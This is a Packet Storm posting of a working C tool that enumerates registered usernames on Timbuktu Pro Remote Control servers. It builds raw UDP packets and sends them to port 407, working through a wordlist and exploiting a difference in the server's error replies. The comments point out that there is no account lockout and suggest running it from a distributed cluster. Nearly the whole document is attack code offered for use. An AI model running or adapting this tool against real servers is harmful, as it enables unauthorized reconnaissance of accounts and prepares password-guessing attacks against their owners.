Timbuktu Pro Remote Control user enumeration program. Wordlist-based bruteforce tool that checks whether a given username exists on the target server or not, which is possible due to a difference in the error message returned when the username is invalid versus when the password is invalid.
c1316cb0a42dbdc8c71076a0435e16160c2cbab2ffe04ba0757c56504e85b033/*
Timbuktu Pro Remote Control Program - Registered User Guessing Tool by Conehead 03/05
bruteforce registered usernames against target Timbuktu remote control server PLU database
classic bone-headed mistake of a program differentiating between bad usernames and passwords leads to this type of thing
usernames are not case-sensitive and run from 1 to 31 characters
there are no registered user account lockouts, but server does log attempts
compile: gcc
usage: timbuktu_userbrute <Timbuktu server ip address> <file of single-line usernames> [<number of simultaneous connections>]
example: timbuktu_userbrute 127.0.0.1 usernames.txt 1
Note: It appears that running with more than one simultaneous connection causes confusion and produces false negatives. Run at your own risk! Might try running singles in a distributed cracking cluster fashion.
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define SERV_HOST_PORT 407
#define MAXMESSLEN 2048
#define MAXUSERNAMELEN 31
/* functions:
void UDP_handshake(int*,struct sockaddr_in)
void timbuktu_cred_exchange(int*,int,char*)
void timbuktu_cli(int*,struct sockaddr_in,char*) */
UDP_handshake(sockfd,serv_addr)
register int *sockfd;
struct sockaddr_in serv_addr;
{
close(*sockfd);
if ((*sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
perror("Client: can't open datagram socket");
exit(-1);
}
if (connect(*sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
perror("Client: can't connect to server");
exit(-1);
}
}
timbuktu_cred_exchange(sockfd, username_len, username)
register int sockfd;
int username_len;
char username[MAXUSERNAMELEN];
{
char message[MAXMESSLEN];
char hex_value[4];
bcopy("\x00\x23\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00",message,24);
switch (username_len) {
case 1: strcpy(hex_value,"\x01");
break;
case 2: strcpy(hex_value,"\x02");
break;
case 3: strcpy(hex_value,"\x03");
break;
case 4: strcpy(hex_value,"\x04");
break;
case 5: strcpy(hex_value,"\x05");
break;
case 6: strcpy(hex_value,"\x06");
break;
case 7: strcpy(hex_value,"\x07");
break;
case 8: strcpy(hex_value,"\x08");
break;
case 9: strcpy(hex_value,"\x09");
break;
case 10: strcpy(hex_value,"\x0a");
break;
case 11: strcpy(hex_value,"\x0b");
break;
case 12: strcpy(hex_value,"\x0c");
break;
case 13: strcpy(hex_value,"\x0d");
break;
case 14: strcpy(hex_value,"\x0e");
break;
case 15: strcpy(hex_value,"\x0f");
break;
case 16: strcpy(hex_value,"\x10");
break;
case 17: strcpy(hex_value,"\x11");
break;
case 18: strcpy(hex_value,"\x12");
break;
case 19: strcpy(hex_value,"\x13");
break;
case 20: strcpy(hex_value,"\x14");
break;
case 21: strcpy(hex_value,"\x15");
break;
case 22: strcpy(hex_value,"\x16");
break;
case 23: strcpy(hex_value,"\x17");
break;
case 24: strcpy(hex_value,"\x18");
break;
case 25: strcpy(hex_value,"\x19");
break;
case 26: strcpy(hex_value,"\x1a");
break;
case 27: strcpy(hex_value,"\x1b");
break;
case 28: strcpy(hex_value,"\x1c");
break;
case 29: strcpy(hex_value,"\x1d");
break;
case 30: strcpy(hex_value,"\x1e");
break;
case 31: strcpy(hex_value,"\x1f");
}
bcopy(hex_value,message+24,1);
bcopy("\x00\x00\x00\x00\x00\x00\x00",message+25,7);
bcopy("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",message+32,16);
bcopy("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",message+48,16);
bcopy(username,message+25,username_len);
if (sendto(sockfd, message, 25+username_len, 0, NULL, 0) <
25+username_len) {
perror("Client: sendto error on socket");
exit(-1);
}
if (recvfrom(sockfd, message, 36, 0, NULL, 0)
< 36) {
perror("Client: recvfrom error");
exit(-1);
}
if (bcmp(message+3,"\xb7",1) == 0) {
printf("%s is an existing username on the Timbuktu server!\n",username);
}
}
timbuktu_cli(sockfd,serv_addr,username)
register int *sockfd;
struct sockaddr_in serv_addr;
char username[MAXUSERNAMELEN];
{
int username_len;
UDP_handshake(sockfd,serv_addr);
username_len=strlen(username);
timbuktu_cred_exchange(*sockfd,username_len,username);
}
main(argc, argv)
int argc;
char *argv[];
{
char *host_address;
struct in_addr *ptr;
struct hostent *hostptr;
int port_number = SERV_HOST_PORT;
char user[40];
char username[MAXUSERNAMELEN+1];
int sockfd;
struct sockaddr_in cli_addr,
serv_addr;
FILE *fileptr;
int num_connects=1;
int child=0;
int id;
int status;
if (argc > 1) {
host_address = argv[1];
if (*host_address >= '0' && *host_address <= '9') { ;
}
else {
hostptr = gethostbyname(host_address);
if (hostptr == NULL) {
perror("gethostby error");
exit(-1);
}
switch (hostptr->h_addrtype) {
case AF_INET:
ptr = (struct in_addr *) *hostptr->h_addr_list;
host_address = inet_ntoa(*ptr);
break;
default:
perror("unknown address type");
exit(-1);
}
}
}
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = inet_addr(host_address);
serv_addr.sin_port = htons(port_number);
if (argc >3) {
num_connects=atoi(argv[3]);
}
if (argc >2) {
fileptr = fopen(argv[2],"r");
if (fileptr == NULL) {
perror("fopen error");
exit(-1);
}
while (fgets(user,40,fileptr)) {
if (strlen(user) < MAXUSERNAMELEN+2) {
child++;
bcopy("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",username,MAXUSERNAMELEN+1);
strncpy(username,user,strlen(user)-1);
id = fork();
if (id < 0) {
perror("An error occurred spawning the child");
exit(-1);
}
if (id == 0) {
timbuktu_cli(&sockfd,serv_addr,username);
exit(0);
}
if (child==num_connects) {
wait(&status);
child=0;
}
}
}
close(sockfd);
}
exit(0);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed